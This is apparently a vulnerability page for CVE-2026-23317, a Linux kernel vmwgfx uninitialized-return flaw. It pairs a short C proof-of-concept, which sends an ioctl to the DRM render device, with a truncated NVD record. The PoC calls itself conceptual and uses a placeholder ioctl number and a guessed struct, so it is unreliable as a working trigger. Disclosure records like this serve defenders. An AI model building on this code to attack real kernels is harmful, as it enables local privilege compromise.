CVE-2026-23317

#include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <drm/drm.h> /* * PoC for CVE-2026-23317 * This is a conceptual trigger for the vmw_translate_ptr vulnerability. * It attempts to interact with the vmwgfx device to trigger the faulty path. */ #define DRM_IOCTL_VMW_TRANSLATE_PTR 0x64 // Example IOCTL placeholder int main() { int fd; // Open the DRM device, typically /dev/dri/renderD128 or card0 for vmwgfx fd = open("/dev/dri/renderD128", O_RDWR); if (fd < 0) { perror("Failed to open device"); return 1; } // Construct a request that might trigger the vulnerable code path. // The exact structure depends on the driver's internal definitions. struct drm_vmw_translate_ptr_arg { uint32_t handle; uint32_t pad64; uint64_t ptr; // Output pointer that becomes uninitialized } arg; arg.handle = 0xDEADBEEF; // Invalid handle to force lookup failure // Invoke the IOCTL if (ioctl(fd, DRM_IOCTL_VMW_TRANSLATE_PTR, &arg) != 0) { perror("IOCTL failed"); } else { printf("IOCTL succeeded (potentially exploiting uninitialized return)\n"); } close(fd); return 0; }

{"cve": {"id": "CVE-2026-23317", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-25T11:16:28.220", "lastModified": "2026-04-23T21:09:29.110", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/vmwgfx: Return the correct value in vmw_translate_ptr functions\n\nBefore the referenced fixes these functions used a lookup function that\nreturned a pointer. This was changed to another lookup function that\nreturned an error code with the pointer becoming an out parameter.\n\nThe error path when the lookup failed was not changed to reflect this\nchange and the code continued to return the PTR_ERR of the now\nuninitialized pointer. This could cause the vmw_translate_ptr functions\nto return success when they actually failed causing further uninitialized\nand OOB accesses."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\ndrm/vmwgfx: Devolver el valor correcto en las funciones vmw_translate_ptr\n\nAntes de las correcciones referenciadas, estas funciones utilizaban una función de búsqueda que devolvía un puntero. Esto fue cambiado a otra función de búsqueda que devolvía un código de error con el puntero convirtiéndose en un parámetro de salida.\n\nLa ruta de error cuando la búsqueda fallaba no fue cambiada para reflejar este cambio y el código continuó devolviendo el PTR_ERR del puntero ahora no inicializado. Esto podría causar que las funciones vmw_translate_ptr devolvieran éxito cuando en realidad fallaron, causando accesos no inicializados y OOB adicionales."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-908"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.7", "versionEndExcluding": "6.1.167", "matchCriteriaId": "7DEF25F5-7BE0-47C6-9F8F-D3CA62F09F1E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.1", "versionEndExcluding": "6.6.130", "matchCriteriaId": "1904C76C-974E-4DEA-9E2B-C26F3C5420AD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.77", "matchCriteriaId": "B3D12E00-E42D-4056-B354-BAD4903C03A5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.17", "matchCriteriaId": "A5E006E4-59C7-43C1-9231-62A72219F2BA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.7", "matchCriteriaId": "69245D10-0B71-485E-80C3-A64F077004D3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.2:-:*:*:*:*:*:*", "matchCriteriaId": "3ADCCCEE-143A-4B48-9B2A-0CB97BD385DE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc7:*:*:*:*:*:*", "matchCriteriaId": "512EE3A8-A590-4501-9A94-5D4B268D6138"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/149f028772fa2879d9316b924ce948a6a0877e45", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/36cb28b6d303a81e6ed4536017090e85e0143e42", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5023ca80f9589295cb60735016e39fc5cc714243", "source": "416 ... (truncated)